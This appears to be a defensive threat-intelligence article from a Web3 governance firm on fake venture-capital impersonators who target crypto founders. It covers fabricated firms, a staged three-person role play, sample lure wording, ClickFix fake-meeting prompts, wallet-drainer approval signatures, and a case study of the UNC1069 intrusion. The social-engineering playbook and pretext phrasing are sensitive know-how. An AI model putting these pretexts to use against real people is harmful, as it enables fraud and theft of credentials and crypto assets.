Part 1 of this series introduced the Polity Web3 Investor Actor Classification – a structured decision tool for assessing counterparties along two dimensions: identity assurance and behavioural intent.
This instalment supplies the threat intelligence that informs its application: the anatomy of modern impersonation campaigns, the social-engineering tactics that sustain them, and a detailed case study of a state-sponsored intrusion.
Anatomy of the Modern VC Impersonator
Today’s VC impersonators operate with the precision of a professional services firm.
They are typically organised cybercriminal groups, some acting as Initial Access Brokers who specialise in gaining a foothold in a company’s infrastructure before executing a drainer script or selling the access onward.
In February 2026, Mandiant published findings (1) attributing a sophisticated crypto-sector intrusion to UNC1069, a financially motivated threat actor with a suspected DPRK nexus tracked since 2018. Moonlock Lab’s independent investigation in early March 2026 (2) confirmed that fabricated VC identities – including “SolidBit Capital”, “MegaBit”, and “Lumax Capital” – are central to this campaign, corroborating a pattern first publicly documented by a victim on X in January 2026.
The Corporate Façade
These groups go well beyond impersonating individuals – they build shadow firms.
They create websites for fictitious entities that look more polished than many legitimate funds, complete with fabricated team histories, portfolios stolen from real VCs, and functional “investor portals”. They frequently purchase aged LinkedIn accounts and X profiles to simulate years of industry presence.
The Multi-Channel Role Play
A typical operation follows a three-act structure.
First, a “Scout” (posing as a junior analyst) reaches out on LinkedIn or X with highly personalised flattery, referencing the target’s whitepaper or a recent technical update.
Once the founder is engaged, they are “escalated” to a “Principal” – a senior partner persona that may use AI voice cloning or deepfake video during short, choppy calls to establish authority.
Finally, an “Engineer” introduces a technical requirement, such as a proprietary due-diligence tool or “secure meeting plugin”, which serves as the payload delivery mechanism.
Social Engineering Tactics in 2026
Identifying these actors is only half the picture; what makes them dangerous is how they make first contact and sustain the deception.
The hallmark of a 2026 VC impersonation campaign is extreme personalisation.
These campaigns target individual founders through prolonged social engineering rather than mass phishing, often investing weeks or even months in building a single relationship before attempting compromise.
The LinkedIn Flattery Loop
Attackers use AI scrapers to identify founders who have recently posted about a successful round or product launch. They send connection requests with notes such as “Enjoyed your thesis on modularity – we’re looking to deploy $2M into the infra space; would love to sync.”
Because founders are conditioned to network, these requests have high acceptance rates.
Once connected, the attacker warms the lead for days with legitimate-sounding questions about the technology stack before making a move.
The Proprietary Meeting Pivot
The most dangerous phase occurs when the attacker moves the conversation off-platform, suggesting a “secure” or “investor-only” version of Zoom or Google Meet, claiming it is used for compliance and encrypted deal-flow discussions.
This is almost always a precursor to a ClickFix attack: the target receives a link to a landing page that mimics a meeting invite. When they click “Join”, the page simulates a browser error (e.g., “Microphone not found”) and prompts them to “fix it” by running a terminal command – the malicious payload.
The Fake Due-Diligence Portal
Another common approach involves a counterfeit investor portal. The target is asked to upload a pitch deck and then “verify traction” by connecting a wallet.
The dashboard is a drainer: the connection request may appear “read-only” but hidden in the transaction data is a setApprovalForAll or permit signature – smart-contract functions that silently grant the attacker unrestricted access to transfer the victim’s assets.
The Technical Payload: ClickFix and Infostealers
The “ClickFix” mechanism – sometimes called “living-off-the-user” – is currently the leading infection vector in crypto-targeted social engineering campaigns (2).
Unlike traditional drive-by downloads, ClickFix attacks require the victim to manually execute the malicious payload, thereby bypassing endpoint security tools entirely.
The CyberProof January 2026 analysis (3) confirmed that the latest variant targets cryptocurrency wallets including MetaMask, Exodus, and Trust Wallet, while simultaneously harvesting credentials from over 25 browsers. Microsoft subsequently disclosed a DNS-based ClickFix variant using nslookup for payload staging (4).
The technical execution: when the victim lands on the spoofed meeting page, a script detects the operating system and displays a professional-looking prompt: “To join the secure call, please update your browser’s WebRTC component.”
The victim copies and executes a terminal command that launches a payload performing session hijacking (scraping saved passwords and active session cookies), key scraping (searching for private-key files in local directories), and persistence installation (a backdoor that survives reboot).
Case Study: The UNC1069 Intrusion (Mandiant, February 2026)
In a documented incident investigated by Mandiant (1), a FinTech entity in the cryptocurrency sector was targeted by UNC1069. The attacker contacted the victim via a compromised Telegram account belonging to an executive at a legitimate cryptocurrency company, building rapport over several days before sharing a Calendly link that redirected to a spoofed Zoom page hosted on attacker-controlled infrastructure.
During the fake video call, the attacker deployed an AI-generated deepfake of a known CEO and simulated an audio issue to justify requesting the victim to run terminal commands. Mandiant’s forensic analysis recovered seven distinct malware families from the compromised host, including the DPRK-associated downloader SUGARLOADER and six newly identified families (WAVESHAPER, HYPERCALL, HIDDENCALL, SILENCELIFT, DEEPBREATH, and CHROMEPUSH).
The DEEPBREATH data miner manipulated macOS privacy controls to gain broad file-system access, enabling theft of browser credentials, wallet data, and identity documents.
Key lesson: the length of social-engineering engagement is not proof of legitimacy. Under the Polity Web3 Investor Actor Classification, the UNC1069 operation is a textbook A-5 (Fraudulent Impersonator): fabricated identity, deepfake presentation, and malicious payload delivery. Had the F-DD Protocol been applied, Step 2 (back-channel verification via the real firm) would have exposed the fabrication before any technical compromise occurred.
If a counterparty insists on proprietary meeting software, asks you to run terminal commands, or resists moving to your own video-conferencing platform, disengage immediately.
Next week: Part 3 sets out the operational controls that underpin the classification framework – treasury segmentation, identity and access management, incident response, and the strategic case for treating counterparty governance as infrastructure.
About Polity
The Web3 Investor Actor Classification presented in this series is the first of several governance primitives being developed as part of the Polity governance model. Polity builds infrastructure for regulated digital finance. Its governance frameworks are designed to bridge decentralised systems and institutional-grade compliance requirements, with a focus on GDPR, eIDAS 2.0, DORA, and MiCA alignment across European and international markets.
Disclaimer: This article is published for informational and educational purposes only. It does not constitute investment advice, legal advice, or an endorsement of any product, service, or security practice. Polity does not provide investment advice, custody services, or regulated crypto-asset activities. Readers should conduct their own due diligence and consult qualified professionals before making any decisions based on the content of this publication. All third-party sources are cited for reference; their inclusion does not imply endorsement by or affiliation with Polity.
References
(1) Mandiant / Google Threat Intelligence Group (2026). ‘UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering.’ Google Cloud Blog. Available at: https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering (Accessed: 9 March 2026).
(2) Moonlock Lab (2026). ‘Fake VCs Target Crypto Talent in a New ClickFix Campaign.’ Moonlock. Available at: https://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign (Accessed: 9 March 2026).
(3) CyberProof (2026). ‘Fake CAPTCHA Attack Uncovered: ClickFix Infostealer Campaign.’ CyberProof Research. Available at: https://www.cyberproof.com/blog/fake-captcha-attack-uncovered-clickfix-infostealer-campaign/ (Accessed: 9 March 2026).
(4) Microsoft Threat Intelligence (2026). ‘DNS-Based ClickFix Attack Using Nslookup for Malware Staging.’ Reported via The Hacker News. Available at: https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html (Accessed: 9 March 2026).
